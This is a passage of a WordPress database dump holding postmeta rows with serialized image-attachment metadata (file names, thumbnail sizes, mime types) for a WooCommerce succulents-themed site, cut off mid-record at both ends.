_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"blog-img-12-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1362,3730,'_wp_attachment_image_alt','o'),(1363,3732,'_wp_attachment_image_alt','o'),(1364,3346,'_wp_attachment_image_alt','a'),(1365,3368,'_wp_attachment_image_alt','a'),(1366,3369,'_wp_attachment_image_alt','a'),(1367,3736,'_wp_attached_file','2018/03/papaja2.png'),(1368,3736,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:561;s:4:\"file\";s:19:\"2018/03/papaja2.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"papaja2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"papaja2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"papaja2-283x300.png\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"papaja2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"papaja2-530x300.png\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"papaja2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"papaja2-530x550.png\";s:5:\"width\";i:530;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:19:\"papaja2-530x550.png\";s:5:\"width\";i:530;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"papaja2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"papaja2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1369,3376,'_wp_attached_file','2018/02/h4-img-3.jpg'),(1370,3376,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:700;s:4:\"file\";s:20:\"2018/02/h4-img-3.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-3-150x300.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h4-img-3-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h4-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h4-img-3-350x550.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h4-img-3-350x550.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h4-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1371,3732,'_wp_attachment_image_alt','o'),(1372,3736,'_wp_attachment_image_alt',''),(1373,3369,'_wp_attachment_image_alt','a'),(1374,3376,'_wp_attachment_image_alt','a'),(1375,3757,'_wp_attached_file','2018/03/sh-single-landing.png'),(1376,3757,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:717;s:6:\"height\";i:432;s:4:\"file\";s:29:\"2018/03/sh-single-landing.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"sh-single-landing-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-600x362.png\";s:5:\"width\";i:600;s:6:\"height\";i:362;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-300x181.png\";s:5:\"width\";i:300;s:6:\"height\";i:181;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-550x432.png\";s:5:\"width\";i:550;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-550x432.png\";s:5:\"width\";i:550;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"sh-single-landing-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-600x362.png\";s:5:\"width\";i:600;s:6:\"height\";i:362;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"sh-single-landing-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1377,3376,'_wp_attachment_image_alt','a'),(1378,3377,'_wp_attached_file','2018/01/h9-img-17.jpg'),(1379,369,'_wp_attachment_image_alt','a'),(1380,3377,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:351;s:6:\"height\";i:227;s:4:\"file\";s:21:\"2018/01/h9-img-17.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h9-img-17-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h9-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h9-img-17-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h9-img-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h9-img-17-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h9-img-17-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h9-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1381,4256,'_wp_attached_file','2018/01/h9-img-17-1.jpg'),(1382,4256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:351;s:6:\"height\";i:227;s:4:\"file\";s:23:\"2018/01/h9-img-17-1.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"h9-img-17-1-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"h9-img-17-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"h9-img-17-1-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"h9-img-17-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"h9-img-17-1-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"h9-img-17-1-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"h9-img-17-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1383,3377,'_wp_attachment_image_alt','a'),(1384,385,'_wp_attached_file','2018/01/h2-img-5.jpg'),(1385,385,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:746;s:6:\"height\";i:564;s:4:\"file\";s:20:\"2018/01/h2-img-5.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h2-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h2-img-5-600x454.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h2-img-5-300x227.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h2-img-5-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h2-img-5-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h2-img-5-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h2-img-5-746x550.jpg\";s:5:\"width\";i:746;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h2-img-5-550x564.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h2-img-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h2-img-5-600x454.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1386,4256,'_wp_attachment_image_alt','a'),(1387,1003,'_wp_attachment_image_alt','a'),(1388,3396,'_wp_attached_file','2018/02/landing-slide1-graphic1-1.png'),(1389,3396,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:561;s:6:\"height\";i:329;s:4:\"file\";s:37:\"2018/02/landing-slide1-graphic1-1.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-300x176.png\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-561x300.png\";s:5:\"width\";i:561;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-550x329.png\";s:5:\"width\";i:550;s:6:\"height\";i:329;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-550x329.png\";s:5:\"width\";i:550;s:6:\"height\";i:329;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-slide1-graphic1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1390,4257,'_wp_attached_file','2018/02/landing-slide1-graphic1.png'),(1391,4257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:561;s:6:\"height\";i:329;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic1.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-300x176.png\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-561x300.png\";s:5:\"width\";i:561;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-550x329.png\";s:5:\"width\";i:550;s:6:\"height\";i:329;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-550x329.png\";s:5:\"width\";i:550;s:6:\"height\";i:329;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide1-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1392,1804,'_wp_attachment_image_alt','a'),(1393,1004,'_wp_attached_file','2018/01/blog-img-11.jpg'),(1394,1004,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:23:\"2018/01/blog-img-11.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"blog-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"blog-img-11-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blog-img-11-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"blog-img-11-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"blog-img-11-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"blog-img-11-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"blog-img-11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"blog-img-11-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"blog-img-11-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"blog-img-11-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"blog-img-11-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1395,1805,'_wp_attached_file','2018/02/portfolio-img-3.jpg'),(1396,1805,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-3.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"med